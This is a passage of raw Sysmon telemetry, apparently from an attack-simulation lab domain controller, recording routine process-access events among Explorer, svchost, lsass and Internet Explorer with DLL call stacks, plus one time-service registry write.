32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.779{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6437|C:\Windows\System32\shcore.dll+6327|C:\Windows\System32\shcore.dll+629d|C:\Windows\System32\shcore.dll+61aa|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+889ee|C:\Windows\SYSTEM32\IEFRAME.dll+ab89a|C:\Windows\SYSTEM32\IEFRAME.dll+acd59|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add|C:\Windows\SYSTEM32\IEFRAME.dll+b4e0b|C:\Windows\SYSTEM32\IEFRAME.dll+c6617|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8|C:\Windows\SYSTEM32\IEFRAME.dll+f7ab0|C:\Windows\SYSTEM32\IEFRAME.dll+2e821|C:\Windows\SYSTEM32\IEFRAME.dll+2a83a6|C:\Windows\SYSTEM32\IEFRAME.dll+152634|C:\Windows\SYSTEM32\IEFRAME.dll+ccc61 10341000x800000000000000013084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.779{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+889ee|C:\Windows\SYSTEM32\IEFRAME.dll+ab89a|C:\Windows\SYSTEM32\IEFRAME.dll+acd59|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add|C:\Windows\SYSTEM32\IEFRAME.dll+b4e0b|C:\Windows\SYSTEM32\IEFRAME.dll+c6617|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8|C:\Windows\SYSTEM32\IEFRAME.dll+f7ab0|C:\Windows\SYSTEM32\IEFRAME.dll+2e821|C:\Windows\SYSTEM32\IEFRAME.dll+2a83a6|C:\Windows\SYSTEM32\IEFRAME.dll+152634 10341000x800000000000000013083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.779{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+889ee|C:\Windows\SYSTEM32\IEFRAME.dll+ab89a|C:\Windows\SYSTEM32\IEFRAME.dll+acd59|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add|C:\Windows\SYSTEM32\IEFRAME.dll+b4e0b|C:\Windows\SYSTEM32\IEFRAME.dll+c6617|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8|C:\Windows\SYSTEM32\IEFRAME.dll+f7ab0|C:\Windows\SYSTEM32\IEFRAME.dll+2e821|C:\Windows\SYSTEM32\IEFRAME.dll+2a83a6|C:\Windows\SYSTEM32\IEFRAME.dll+152634|C:\Windows\SYSTEM32\IEFRAME.dll+ccc61 10341000x800000000000000013082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.248{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:44.139{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:43.998{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:43.998{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.529{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.529{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4753-6000-1105-000000009A01}45042676C:\Windows\system32\taskhostw.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6437|C:\Windows\System32\shcore.dll+6327|C:\Windows\System32\shcore.dll+629d|C:\Windows\System32\shcore.dll+61aa|C:\Windows\System32\SHELL32.dll+efa37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9174|UNKNOWN(FFFFF8021D6E18D8)|UNKNOWN(FFFFAA4CF6CB21F8)|UNKNOWN(FFFFAA4CF6CACEA5)|UNKNOWN(FFFFAA4CF6CAFCE8)|UNKNOWN(FFFFAA4CF6CB40D9)|UNKNOWN(FFFFAA4CF6CB4C03)|UNKNOWN(FFFFAA4CF6CA6B80)|UNKNOWN(FFFFAA4CF6CA503B)|UNKNOWN(FFFFAA4CF6C2917A)|UNKNOWN(FFFFAA4CF6CA5C33)|UNKNOWN(FFFFF8021D3F8E03)|C:\Windows\System32\win32u.dll+1524 10341000x800000000000000013103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4754-6000-1705-000000009A01}3408936C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+2fd1a|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.451{08A6967A-4754-6000-1705-000000009A01}3408936C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+3007c|C:\Windows\Explorer.EXE+30028|C:\Windows\Explorer.EXE+2fccc|C:\Windows\Explorer.EXE+2ff29|C:\Windows\Explorer.EXE+2fc59|C:\Windows\Explorer.EXE+3ab97|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.435{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\SHELL32.dll+efb85|C:\Windows\System32\SHELL32.dll+ef687|C:\Windows\System32\SHELL32.dll+ef5b8|C:\Windows\System32\SHELL32.dll+efd42|C:\Windows\SYSTEM32\IEFRAME.dll+11ea38|C:\Windows\SYSTEM32\IEFRAME.dll+b3202|C:\Windows\SYSTEM32\IEFRAME.dll+b564e|C:\Windows\SYSTEM32\IEFRAME.dll+b5ed4|C:\Windows\SYSTEM32\IEFRAME.dll+8331e|C:\Windows\SYSTEM32\IEFRAME.dll+ba051|C:\Windows\SYSTEM32\IEFRAME.dll+ac515|C:\Windows\SYSTEM32\IEFRAME.dll+ad049|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add|C:\Windows\SYSTEM32\IEFRAME.dll+b4e0b|C:\Windows\SYSTEM32\IEFRAME.dll+c6617|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8 10341000x800000000000000013100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.435{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+124a5|C:\Windows\System32\SHELL32.dll+efb01|C:\Windows\System32\SHELL32.dll+ef687|C:\Windows\System32\SHELL32.dll+ef5b8|C:\Windows\System32\SHELL32.dll+efd42|C:\Windows\SYSTEM32\IEFRAME.dll+11ea38|C:\Windows\SYSTEM32\IEFRAME.dll+b3202|C:\Windows\SYSTEM32\IEFRAME.dll+b564e|C:\Windows\SYSTEM32\IEFRAME.dll+b5ed4|C:\Windows\SYSTEM32\IEFRAME.dll+8331e|C:\Windows\SYSTEM32\IEFRAME.dll+ba051|C:\Windows\SYSTEM32\IEFRAME.dll+ac515|C:\Windows\SYSTEM32\IEFRAME.dll+ad049|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add|C:\Windows\SYSTEM32\IEFRAME.dll+b4e0b|C:\Windows\SYSTEM32\IEFRAME.dll+c6617|C:\Windows\SYSTEM32\IEFRAME.dll+f7ba8 10341000x800000000000000013099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.435{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+6422|C:\Windows\System32\shcore.dll+611d|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\SHELL32.dll+efae5|C:\Windows\System32\SHELL32.dll+ef687|C:\Windows\System32\SHELL32.dll+ef5b8|C:\Windows\System32\SHELL32.dll+efd42|C:\Windows\SYSTEM32\IEFRAME.dll+11ea38|C:\Windows\SYSTEM32\IEFRAME.dll+b3202|C:\Windows\SYSTEM32\IEFRAME.dll+b564e|C:\Windows\SYSTEM32\IEFRAME.dll+b5ed4|C:\Windows\SYSTEM32\IEFRAME.dll+8331e|C:\Windows\SYSTEM32\IEFRAME.dll+ba051|C:\Windows\SYSTEM32\IEFRAME.dll+ac515|C:\Windows\SYSTEM32\IEFRAME.dll+ad049|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000013098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.435{08A6967A-4780-6000-3905-000000009A01}68686872C:\Program Files\Internet Explorer\iexplore.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+6468|C:\Windows\System32\shcore.dll+60f4|C:\Windows\System32\shcore.dll+5ddd|C:\Windows\System32\shcore.dll+5d6f|C:\Windows\System32\shcore.dll+5c74|C:\Windows\System32\SHELL32.dll+efae5|C:\Windows\System32\SHELL32.dll+ef687|C:\Windows\System32\SHELL32.dll+ef5b8|C:\Windows\System32\SHELL32.dll+efd42|C:\Windows\SYSTEM32\IEFRAME.dll+11ea38|C:\Windows\SYSTEM32\IEFRAME.dll+b3202|C:\Windows\SYSTEM32\IEFRAME.dll+b564e|C:\Windows\SYSTEM32\IEFRAME.dll+b5ed4|C:\Windows\SYSTEM32\IEFRAME.dll+8331e|C:\Windows\SYSTEM32\IEFRAME.dll+ba051|C:\Windows\SYSTEM32\IEFRAME.dll+ac515|C:\Windows\SYSTEM32\IEFRAME.dll+ad049|C:\Windows\SYSTEM32\IEFRAME.dll+ae592|C:\Windows\SYSTEM32\IEFRAME.dll+aa608|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32add 10341000x800000000000000013097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.248{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.217{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:45.060{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:47.685{08A6967A-4754-6000-1705-000000009A01}34083028C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51f47|C:\Windows\Explorer.EXE+3ada8|C:\Windows\Explorer.EXE+3ac34|C:\Windows\Explorer.EXE+3aba1|C:\Windows\System32\windows.storage.dll+f51c7|C:\Windows\System32\windows.storage.dll+f3f4f|C:\Windows\System32\windows.storage.dll+f246f|C:\Windows\System32\SHCORE.dll+328c6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:47.685{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:47.685{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:48.560{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+50e44|C:\Windows\System32\SHELL32.dll+51970|C:\Windows\System32\TwinUI.dll+144fa1|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:48.560{08A6967A-4754-6000-1705-000000009A01}34085132C:\Windows\Explorer.EXE{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+144dd9|C:\Windows\System32\TwinUI.dll+14580f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:30:48.560{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea79-0x78618f61) 10341000x800000000000000013123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:49.295{08A6967A-4780-6000-3905-000000009A01}68686904C:\Program Files\Internet 